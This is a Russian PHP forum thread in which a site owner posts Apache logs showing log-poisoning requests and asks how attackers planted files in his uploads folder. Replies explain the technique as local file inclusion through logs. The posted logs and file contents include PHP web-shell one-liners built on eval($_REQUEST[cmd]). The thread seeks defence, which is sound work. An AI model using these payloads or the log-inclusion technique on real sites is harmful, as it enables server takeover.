PHP.SU

Программирование на PHP, MySQL и другие веб-технологии

PHP.SU Портал

Главная

Помощь

Поиск

Поиск Яндекс Вакансии

Пользователи

Здравствуйте, Гость

( Вход · Регистрация · Правила форума )

Забыли пароль?

Оброботка GET

Форумы портала PHP.SU » PHP » Программирование на PHP » Вопросы новичков (Модераторы: OrmaJever, Саныч, Строитель)

Страниц (1): [1]

Без описания

Поиск в теме | Версия для печати

resik	Отправлено: 04 Января, 2014 - 17:44:05
Новичок Покинул форум Сообщений всего: 51 Дата рег-ции: Дек. 2013 Помог: 0 раз(а)	Всем привет! На днях листая логи апача увидел такое содержание: CODE (log): скопировать код в буфер обмена - - "GET /public/min/index.php?ipbv=32006&f=public/style_css/css_4/ipb_mlist_addon.css,public/style_css/css_4/ipb_help.css,public/style_css/css_4/calendar_select.css,public/style_css/css_4/ipb_common.css,public/style_css/css_4/ipb_styles.css HTTP/1.0" 200 15685 - - "GET /public/min/index.php?ipbv=&charset=UTF-8&f=public/js/ipb.js,cache/lang_cache/1/ipb.lang.js,public/js/ips.hovercard.js,public/js/ips.quickpm.js,public/js/ips.board.js HTTP/1.0" 200 31885 - - "GET /public/min/index.php?ipbv=&g=js HTTP/1.0" 200 45384 - - "GET /index.php HTTP/1.0" 200 66789 - - "GET /index.php?<?php error_reporting(0);print(___);eval($_REQUEST[cmd]);die; ?> HTTP/1.0" 200 66815 - - "GET /uploads/1.txt HTTP/1.0" 200 316 - - "GET /index.php?<?error_reporting(0);print(___);eval($_REQUEST[cmd]);die;?> HTTP/1.0" 200 66937 - - "GET /uploads/1.php HTTP/1.0" 200 370 - - "GET /index.php?<?error_reporting(0);print(___);eval($_REQUEST[cmd]);die;?> HTTP/1.0" 200 66937 - - "GET /1.php HTTP/1.0" 404 271 - - "GET /index.php HTTP/1.0" 200 66789 - - "GET /index.php?<?php eval($_REQUEST[cmd]); ?> HTTP/1.0" 200 66815 - - "GET /uploads/1.php HTTP/1.0" 500 - - - "GET /index.php?<?php error_reporting(0);\tprint(___);\teval($_REQUEST[cmd]);\tdie; ?> HTTP/1.0" 200 66815 - - "GET /uploads/3.php HTTP/1.0" 500 - - - "GET /uploads/3.php?cmd=phpinfo(); HTTP/1.0" 500 - - - "GET /index.php?<?php error_reporting(0);\tprint(___);\teval($_REQUEST[cmd]);\tdie; ?> HTTP/1.0" 200 66815 - - "GET /index.php?<?phpeval($_REQUEST[cmd]);?> HTTP/1.0" 200 66909 - - "GET /index.php?<?error_reporting(0);print(___);eval($_REQUEST[cmd]);die;?> HTTP/1.0" 200 66776 - - "GET /public/min/index.php?ipbv=32006&f=public/style_css/css_4/ipb_mlist_addon.css,public/style_css/css_4/calendar_select.css,public/style_css/css_4/ipb_common.css,public/style_css/css_4/ipb_styles.css,public/style_css/prettify.css HTTP/1.0" 200 15673 - - "GET /public/min/index.php?ipbv=&charset=UTF-8&f=public/js/ipb.js,cache/lang_cache/1/ipb.lang.js,public/js/ips.hovercard.js,public/js/ips.quickpm.js,public/js/ips.sharelinks.js,public/js/ips.topic.js,public/js/ips.like.js HTTP/1.0" 200 36474 - - "GET /index.php?<?php%20eval($_REQUEST[cmd]);%20?> HTTP/1.0" 200 67084 - - "GET /public/min/index.php?ipbv=32006&f=public/style_css/css_4/ipb_mlist_addon.css,public/style_css/css_4/ipb_help.css,public/style_css/css_4/calendar_select.css,public/style_css/css_4/ipb_common.css,public/style_css/css_4/ipb_styles.css HTTP/1.0" 304 - - - "GET /public/min/index.php?ipbv=&g=js HTTP/1.0" 304 - - - "GET /public/min/index.php?ipbv=&charset=UTF-8&f=public/js/ipb.js,cache/lang_cache/1/ipb.lang.js,public/js/ips.hovercard.js,public/js/ips.quickpm.js,public/js/ips.board.js HTTP/1.0" 304 - - - "GET /index.php?%3C%3Fphp+eval%28%24_REQUEST%5Bcmd%5D%29%3B+%3F%3E HTTP/1.0" 200 66724 Залитый файл через GET, как, как защитится? Кто то сталкивался с таким методом взлома, помогите советом по защите/обработке от подобного вида взлома. Заранее благодарен за любые подсказки и комментарии!

caballero	Отправлено: 04 Января, 2014 - 18:05:41
Активный участник Покинул форум Сообщений всего: 5998 Дата рег-ции: Сент. 2011 Откуда: Харьков Помог: 126 раз(а)	файлы через GET не заливаются ----- Бесплатная система складского учета с открытым кодом https://zippy[dot]com[dot]ua/zstore

zelenin	Отправлено: 04 Января, 2014 - 19:23:02
Новичок Покинул форум Сообщений всего: 36 Дата рег-ции: Дек. 2012 Помог: 1 раз(а)	в какой строке вы видите залитый файл?

caballero	Отправлено: 04 Января, 2014 - 19:29:31
Активный участник Покинул форум Сообщений всего: 5998 Дата рег-ции: Сент. 2011 Откуда: Харьков Помог: 126 раз(а)	Цитата: Залитый файл через GET, ----- Бесплатная система складского учета с открытым кодом https://zippy[dot]com[dot]ua/zstore

Ts.Saltan	Отправлено: 06 Января, 2014 - 12:35:56
Посетитель Покинул форум Сообщений всего: 384 Дата рег-ции: Дек. 2013 Откуда: Belarus Помог: 22 раз(а)	resik пишет: eval($_REQUEST[cmd]) вполне возможно, что данные передавались через cookie а вообще с чего взяли, что где-то был залит файл? всевозможные попытки запустить шелл пресекались 500 ответом сервера Цитата: "GET /uploads/1.php HTTP/1.0" 500 "GET /uploads/3.php HTTP/1.0" 500 "GET /uploads/3.php?cmd=phpinfo(); HTTP/1.0" 500 - (Отредактировано автором: 06 Января, 2014 - 12:39:26)

OrmaJever	Отправлено: 06 Января, 2014 - 12:40:09
Активный участник Покинул форум Сообщений всего: 7540 Дата рег-ции: Янв. 2010 Откуда: Чернигов Помог: 299 раз(а)	resik пишет: Кто то сталкивался с таким методом взлома а где тут взлом то? ----- Если вы хотя бы 3-4 раза не решите всё выкинуть и начать заново - вы явно что-то делаете не так.

resik	Отправлено: 06 Января, 2014 - 13:51:24
Новичок Покинул форум Сообщений всего: 51 Дата рег-ции: Дек. 2013 Помог: 0 раз(а)	Ну может не совсем взлом то. Но файлы в папке uploads которых быть не должно там, были. К примеру за день до проверки логов этих файлов не было (.txt\|.php). Ну и судя по логам: CODE (log): скопировать код в буфер обмена GET /uploads/1.php HTTP/1.0" 200 сервер возвращает ответ 200. Все залитые файлы в папке uploads и еще в несколких были примерно с таких содержимым: CODE (log): скопировать код в буфер обмена <?php error_reporting(0);print(___);eval($_REQUEST[cmd]);die; ?> Вот и возникает вопрос, как их умудрились залить.

bestbios	Отправлено: 06 Января, 2014 - 14:13:15
Гость Покинул форум Сообщений всего: 75 Дата рег-ции: Сент. 2013 Помог: 1 раз(а)	Это локальный инклуд через логи - боянистый метод заливки шеллов.

resik	Отправлено: 06 Января, 2014 - 15:22:49
Новичок Покинул форум Сообщений всего: 51 Дата рег-ции: Дек. 2013 Помог: 0 раз(а)	bestbios пишет: Это локальный инклуд через логи - боянистый метод заливки шеллов. А вот тут если можно поподробнее

bestbios	Отправлено: 06 Января, 2014 - 16:43:22
Гость Покинул форум Сообщений всего: 75 Дата рег-ции: Сент. 2013 Помог: 1 раз(а)	resik пишет: bestbios пишет: Это локальный инклуд через логи - боянистый метод заливки шеллов. А вот тут если можно поподробнее LFI - Local File Include Вкратце зная путь до файла log.txt можно заинклудить его в уязвимый сценарий, в котором инклудятся локальные файлы. (Отредактировано автором: 06 Января, 2014 - 16:50:02)

resik	Отправлено: 06 Января, 2014 - 17:42:15
Новичок Покинул форум Сообщений всего: 51 Дата рег-ции: Дек. 2013 Помог: 0 раз(а)	Спасибо, bestbios! Терь есть что покурить/погуглить и придумать заплатку от этой уязвимости

Поиск в теме | Версия для печати

Страниц (1): [1]

Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)

« Вопросы новичков »

Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.